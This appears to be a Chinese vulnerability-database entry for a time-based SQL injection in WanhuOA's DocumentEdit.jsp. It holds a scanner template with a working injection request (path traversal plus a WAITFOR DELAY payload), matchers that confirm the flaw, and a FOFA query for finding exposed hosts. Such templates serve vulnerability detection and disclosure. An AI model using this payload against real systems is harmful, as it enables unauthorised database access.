wanhu-documentedit-sqli: WanhuOA DocumentEdit.jsp - SQL Injection

日期: 2025-08-01 | 影响软件: WanhuOA | POC: 已公开

漏洞描述

The Wanhu OA DocumentEdit.jsp file has a SQL injection vulnerability. An attacker can perform SQL injection into the database by sending a special request package and obtain sensitive information on the server.

PoC代码[已公开]

id: wanhu-documentedit-sqli

info:
  name: WanhuOA DocumentEdit.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    The Wanhu OA DocumentEdit.jsp file has a SQL injection vulnerability. An attacker can perform SQL injection into the database by sending a special request package and obtain sensitive information on the server.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DocumentEdit.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: time-based-sqli,wanhu,sqli,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains_all(body, "iSignature", "DoYFSignature")'
        condition: and
# digest: 4b0a004830460221009e3deb506760538904f068eac1381ff5f7d997ef2959dd9fbf73ed7c7dda6bfa022100b102af1568fadde7bce50ef43894df73a9680b16f29d361c3e3fe98c5eb4b684:922c64590222798bb761d5b6d8e72950

相关漏洞推荐